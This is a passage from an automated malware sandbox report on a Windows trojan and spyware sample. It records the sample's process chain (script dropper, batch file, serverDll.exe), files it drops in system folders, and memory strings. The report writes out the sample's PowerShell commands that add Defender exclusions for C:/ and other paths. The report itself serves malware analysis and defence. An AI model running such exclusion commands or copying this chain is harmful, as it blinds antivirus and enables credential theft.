                                    Source: powershell.exe, 00000018.00000002.2241574408.000001E2D7D75000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2232434510.000001D438B95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2297114565.000001829CD89000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2095970224.0000016BDBB85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2248514396.0000022E03AC6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2251489241.0000022107939000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2277853585.000001ED80456000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2183832393.0000028DA0986000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2147806551.0000017BCE6B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2127032134.000001B598AB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2074035092.000001BF00227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2241083151.0000026EB6176000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2231218292.0000021700226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2264184291.000001D7CCDF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2139850221.000001FEC7056000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2076640812.000001FC00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2301807573.00000222E48A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.2231198882.000002ACB96C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.2052128238.0000017300227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                                    Source: serverDll.exe, 00000004.00000002.1837299833.0000000003091000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2241574408.000001E2D7B51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2232434510.000001D438971000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2297114565.000001829CB61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2095970224.0000016BDB961000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2248514396.0000022E038A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2251489241.0000022107711000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2277853585.000001ED80231000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2183832393.0000028DA0761000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2147806551.0000017BCE491000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2127032134.000001B598891000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2074035092.000001BF00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2241083151.0000026EB5F51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2231218292.0000021700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2264184291.000001D7CCB11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2139850221.000001FEC6E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2076640812.000001FC00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2301807573.00000222E4681000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.2231198882.000002ACB94A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.2052128238.0000017300001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                    Source: powershell.exe, 00000018.00000002.2241574408.000001E2D7D75000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2232434510.000001D438B95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2297114565.000001829CD89000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2095970224.0000016BDBB85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2248514396.0000022E03AC6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2251489241.0000022107939000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2277853585.000001ED80456000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2183832393.0000028DA0986000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2147806551.0000017BCE6B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2127032134.000001B598AB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2074035092.000001BF00227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2241083151.0000026EB6176000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2231218292.0000021700226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2264184291.000001D7CCDF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2139850221.000001FEC7056000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2076640812.000001FC00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2301807573.00000222E48A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.2231198882.000002ACB96C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.2052128238.0000017300227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                                    Source: powershell.exe, 00000039.00000002.2052128238.0000017300227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                                    Source: 3MImbkovXn.81.dr, SNxmQ9zwAR.81.dr, ef7sCdOibG.81.dr, WnkLkImgaI.81.dr, ozf3zdJEtm.81.dr, RROoHnqcaT.81.dr, B6tMDFra0L.81.dr, MgWuwo6n90.81.dr, rCQJcQwGec.81.dr, mYUY4PEGmj.81.dr, gcpmy6KKUg.81.dr, uZbvpB6qfg.81.dr, jgINNbiuGL.81.dr, NT5MKSTefp.81.dr, 9jbgvsKKEL.81.dr, lbIoY9CclW.81.dr, lJltrPz6EQ.81.dr, SQREmGvJUY.81.dr, kSs9c2TNjm.81.dr, x9Yk7T7h8d.81.dr, IZLy0LadZR.81.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                                    Source: powershell.exe, 00000018.00000002.2241574408.000001E2D7B51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2232434510.000001D438971000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2297114565.000001829CB61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2095970224.0000016BDB961000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2248514396.0000022E038A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2251489241.0000022107711000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2277853585.000001ED80231000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2183832393.0000028DA0761000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2147806551.0000017BCE491000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2127032134.000001B598891000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2074035092.000001BF00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2241083151.0000026EB5F51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2231218292.0000021700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2264184291.000001D7CCB11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2139850221.000001FEC6E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2076640812.000001FC00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2301807573.00000222E4681000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.2231198882.000002ACB94A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.2052128238.0000017300001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                                    Source: 3MImbkovXn.81.dr, SNxmQ9zwAR.81.dr, ef7sCdOibG.81.dr, WnkLkImgaI.81.dr, ozf3zdJEtm.81.dr, RROoHnqcaT.81.dr, B6tMDFra0L.81.dr, MgWuwo6n90.81.dr, rCQJcQwGec.81.dr, mYUY4PEGmj.81.dr, gcpmy6KKUg.81.dr, uZbvpB6qfg.81.dr, jgINNbiuGL.81.dr, NT5MKSTefp.81.dr, 9jbgvsKKEL.81.dr, lbIoY9CclW.81.dr, lJltrPz6EQ.81.dr, SQREmGvJUY.81.dr, kSs9c2TNjm.81.dr, x9Yk7T7h8d.81.dr, IZLy0LadZR.81.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                                    Source: 3MImbkovXn.81.dr, SNxmQ9zwAR.81.dr, ef7sCdOibG.81.dr, WnkLkImgaI.81.dr, ozf3zdJEtm.81.dr, RROoHnqcaT.81.dr, B6tMDFra0L.81.dr, MgWuwo6n90.81.dr, rCQJcQwGec.81.dr, mYUY4PEGmj.81.dr, gcpmy6KKUg.81.dr, uZbvpB6qfg.81.dr, jgINNbiuGL.81.dr, NT5MKSTefp.81.dr, 9jbgvsKKEL.81.dr, lbIoY9CclW.81.dr, lJltrPz6EQ.81.dr, SQREmGvJUY.81.dr, kSs9c2TNjm.81.dr, x9Yk7T7h8d.81.dr, IZLy0LadZR.81.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                                    Source: 3MImbkovXn.81.dr, SNxmQ9zwAR.81.dr, ef7sCdOibG.81.dr, WnkLkImgaI.81.dr, ozf3zdJEtm.81.dr, RROoHnqcaT.81.dr, B6tMDFra0L.81.dr, MgWuwo6n90.81.dr, rCQJcQwGec.81.dr, mYUY4PEGmj.81.dr, gcpmy6KKUg.81.dr, uZbvpB6qfg.81.dr, jgINNbiuGL.81.dr, NT5MKSTefp.81.dr, 9jbgvsKKEL.81.dr, lbIoY9CclW.81.dr, lJltrPz6EQ.81.dr, SQREmGvJUY.81.dr, kSs9c2TNjm.81.dr, x9Yk7T7h8d.81.dr, IZLy0LadZR.81.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                                    Source: 3MImbkovXn.81.dr, SNxmQ9zwAR.81.dr, ef7sCdOibG.81.dr, WnkLkImgaI.81.dr, ozf3zdJEtm.81.dr, RROoHnqcaT.81.dr, B6tMDFra0L.81.dr, MgWuwo6n90.81.dr, rCQJcQwGec.81.dr, mYUY4PEGmj.81.dr, gcpmy6KKUg.81.dr, uZbvpB6qfg.81.dr, jgINNbiuGL.81.dr, NT5MKSTefp.81.dr, 9jbgvsKKEL.81.dr, lbIoY9CclW.81.dr, lJltrPz6EQ.81.dr, SQREmGvJUY.81.dr, kSs9c2TNjm.81.dr, x9Yk7T7h8d.81.dr, IZLy0LadZR.81.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                                    Source: 3MImbkovXn.81.dr, SNxmQ9zwAR.81.dr, ef7sCdOibG.81.dr, WnkLkImgaI.81.dr, ozf3zdJEtm.81.dr, RROoHnqcaT.81.dr, B6tMDFra0L.81.dr, MgWuwo6n90.81.dr, rCQJcQwGec.81.dr, mYUY4PEGmj.81.dr, gcpmy6KKUg.81.dr, uZbvpB6qfg.81.dr, jgINNbiuGL.81.dr, NT5MKSTefp.81.dr, 9jbgvsKKEL.81.dr, lbIoY9CclW.81.dr, lJltrPz6EQ.81.dr, SQREmGvJUY.81.dr, kSs9c2TNjm.81.dr, x9Yk7T7h8d.81.dr, IZLy0LadZR.81.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                                    Source: 3MImbkovXn.81.dr, SNxmQ9zwAR.81.dr, ef7sCdOibG.81.dr, WnkLkImgaI.81.dr, ozf3zdJEtm.81.dr, RROoHnqcaT.81.dr, B6tMDFra0L.81.dr, MgWuwo6n90.81.dr, rCQJcQwGec.81.dr, mYUY4PEGmj.81.dr, gcpmy6KKUg.81.dr, uZbvpB6qfg.81.dr, jgINNbiuGL.81.dr, NT5MKSTefp.81.dr, 9jbgvsKKEL.81.dr, lbIoY9CclW.81.dr, lJltrPz6EQ.81.dr, SQREmGvJUY.81.dr, kSs9c2TNjm.81.dr, x9Yk7T7h8d.81.dr, IZLy0LadZR.81.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                                    Source: powershell.exe, 00000039.00000002.2052128238.0000017300227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                                    Source: 3MImbkovXn.81.dr, SNxmQ9zwAR.81.dr, ef7sCdOibG.81.dr, WnkLkImgaI.81.dr, ozf3zdJEtm.81.dr, RROoHnqcaT.81.dr, B6tMDFra0L.81.dr, MgWuwo6n90.81.dr, rCQJcQwGec.81.dr, mYUY4PEGmj.81.dr, gcpmy6KKUg.81.dr, uZbvpB6qfg.81.dr, jgINNbiuGL.81.dr, NT5MKSTefp.81.dr, 9jbgvsKKEL.81.dr, lbIoY9CclW.81.dr, lJltrPz6EQ.81.dr, SQREmGvJUY.81.dr, kSs9c2TNjm.81.dr, x9Yk7T7h8d.81.dr, IZLy0LadZR.81.drString found in binary or memory: https://www.ecosia.org/newtab/
                                    Source: 3MImbkovXn.81.dr, SNxmQ9zwAR.81.dr, ef7sCdOibG.81.dr, WnkLkImgaI.81.dr, ozf3zdJEtm.81.dr, RROoHnqcaT.81.dr, B6tMDFra0L.81.dr, MgWuwo6n90.81.dr, rCQJcQwGec.81.dr, mYUY4PEGmj.81.dr, gcpmy6KKUg.81.dr, uZbvpB6qfg.81.dr, jgINNbiuGL.81.dr, NT5MKSTefp.81.dr, 9jbgvsKKEL.81.dr, lbIoY9CclW.81.dr, lJltrPz6EQ.81.dr, SQREmGvJUY.81.dr, kSs9c2TNjm.81.dr, x9Yk7T7h8d.81.dr, IZLy0LadZR.81.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWindow created: window name: CLIPBRDWNDCLASS

                                    System Summary

                                    barindex
                                    Windows Scripting host queries suspicious COM object (likely to drop second stage)
                                    Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeCode function: 0_2_00A36FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00A36FAA
                                    Source: C:\ChainbrowserNet\serverDll.exeFile created: C:\Windows\Vss\Writers\Application\upfc.exeJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeFile created: C:\Windows\Vss\Writers\Application\ea1d8f6d871115Jump to behavior
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeCode function: 0_2_00A3848E0_2_00A3848E
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeCode function: 0_2_00A400B70_2_00A400B7
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeCode function: 0_2_00A440880_2_00A44088
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeCode function: 0_2_00A340FE0_2_00A340FE
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeCode function: 0_2_00A551C90_2_00A551C9
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeCode function: 0_2_00A471530_2_00A47153
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeCode function: 0_2_00A332F70_2_00A332F7
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeCode function: 0_2_00A462CA0_2_00A462CA
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeCode function: 0_2_00A443BF0_2_00A443BF
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeCode function: 0_2_00A3C4260_2_00A3C426
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeCode function: 0_2_00A3F4610_2_00A3F461
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeCode function: 0_2_00A5D4400_2_00A5D440
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeCode function: 0_2_00A477EF0_2_00A477EF
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeCode function: 0_2_00A5D8EE0_2_00A5D8EE
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeCode function: 0_2_00A3286B0_2_00A3286B
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeCode function: 0_2_00A3E9B70_2_00A3E9B7
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeCode function: 0_2_00A619F40_2_00A619F4
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeCode function: 0_2_00A46CDC0_2_00A46CDC
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeCode function: 0_2_00A43E0B0_2_00A43E0B
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeCode function: 0_2_00A54F9A0_2_00A54F9A
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeCode function: 0_2_00A3EFE20_2_00A3EFE2
                                    Source: C:\ChainbrowserNet\serverDll.exeCode function: 4_2_00007FFD9BAA0D474_2_00007FFD9BAA0D47
                                    Source: C:\ChainbrowserNet\serverDll.exeCode function: 4_2_00007FFD9BAA0E434_2_00007FFD9BAA0E43
                                    Source: C:\ChainbrowserNet\serverDll.exeCode function: 4_2_00007FFD9BE689A24_2_00007FFD9BE689A2
                                    Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\BnGVmWDc.log 16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeCode function: String function: 00A4EC50 appears 56 times
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeCode function: String function: 00A4F5F0 appears 31 times
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeCode function: String function: 00A4EB78 appears 39 times
                                    Source: HMhdtzxEHf.exe, 00000000.00000002.1671208896.0000000002BC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe.mui` vs HMhdtzxEHf.exe
                                    Source: HMhdtzxEHf.exe, 00000000.00000003.1669507950.0000000002BC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe.mui` vs HMhdtzxEHf.exe
                                    Source: HMhdtzxEHf.exe, 00000000.00000003.1669171959.0000000002BC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe.mui` vs HMhdtzxEHf.exe
                                    Source: HMhdtzxEHf.exeBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs HMhdtzxEHf.exe
                                    Source: HMhdtzxEHf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@84/378@1/1
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeCode function: 0_2_00A36C74 GetLastError,FormatMessageW,0_2_00A36C74
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeCode function: 0_2_00A4A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00A4A6C2
                                    Source: C:\ChainbrowserNet\serverDll.exeFile created: C:\Program Files (x86)\windows portable devices\aaHgUfBgYBljMPbLmzgS.exeJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeFile created: C:\Users\user\Desktop\jRHPiNPQ.logJump to behavior
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2080:120:WilError_03
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeMutant created: NULL
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-Rvg35dAJFEhTQBLXgCcP
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8236:120:WilError_03
                                    Source: C:\ChainbrowserNet\serverDll.exeFile created: C:\Users\user\AppData\Local\Temp\5r0bQyFZF1Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ChainbrowserNet\Fsnwm63YgSc5SNPvS73lTcLZ0fh.bat" "
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeCommand line argument: sfxname0_2_00A4DF1E
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeCommand line argument: sfxstime0_2_00A4DF1E
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeCommand line argument: STARTDLG0_2_00A4DF1E
                                    Source: HMhdtzxEHf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: HMhdtzxEHf.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                    Source: C:\ChainbrowserNet\serverDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ChainbrowserNet\serverDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ChainbrowserNet\serverDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ChainbrowserNet\serverDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ChainbrowserNet\serverDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ChainbrowserNet\serverDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ChainbrowserNet\serverDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ChainbrowserNet\serverDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ChainbrowserNet\serverDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ChainbrowserNet\serverDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ChainbrowserNet\serverDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ChainbrowserNet\serverDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ChainbrowserNet\serverDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ChainbrowserNet\serverDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ChainbrowserNet\serverDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ChainbrowserNet\serverDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ChainbrowserNet\serverDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ChainbrowserNet\serverDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeFile read: C:\Windows\win.iniJump to behavior
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                    Source: WWV5Fl1V7B.81.dr, yqnzCXwB1W.81.dr, MkxctjzYIB.81.dr, 0HGZ8n8wDZ.81.dr, IBmZyEMkAY.81.dr, M8IiWlZHLU.81.dr, EZHx84UQ8r.81.dr, E6gHH0q0OS.81.dr, mozmE8e9NO.81.dr, BmMFhncVO3.81.dr, UegalEoxZ1.81.dr, p9qc6eX7Hw.81.dr, sKZG7HpWm6.81.dr, SNrVU9zagI.81.dr, gJsdKQIPIW.81.dr, MB3u1QHscs.81.dr, gOqp7rJVPV.81.dr, hBXpIC5HNG.81.dr, mivPDBUVsT.81.dr, LXhhdf7XBX.81.dr, lUrDpdxxLT.81.dr, B3b9DIsJMO.81.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                                    Source: HMhdtzxEHf.exeVirustotal: Detection: 73%
                                    Source: HMhdtzxEHf.exeReversingLabs: Detection: 71%
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeFile read: C:\Users\user\Desktop\HMhdtzxEHf.exeJump to behavior
                                    Source: unknownProcess created: C:\Users\user\Desktop\HMhdtzxEHf.exe "C:\Users\user\Desktop\HMhdtzxEHf.exe"
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ChainbrowserNet\xBHgrB3tvHV8NGEL8mvcEkNRMDmhEvT5nxGDfikGQwdW.vbe"
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ChainbrowserNet\Fsnwm63YgSc5SNPvS73lTcLZ0fh.bat" "
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ChainbrowserNet\serverDll.exe "C:\ChainbrowserNet/serverDll.exe"
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ChainbrowserNet/'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
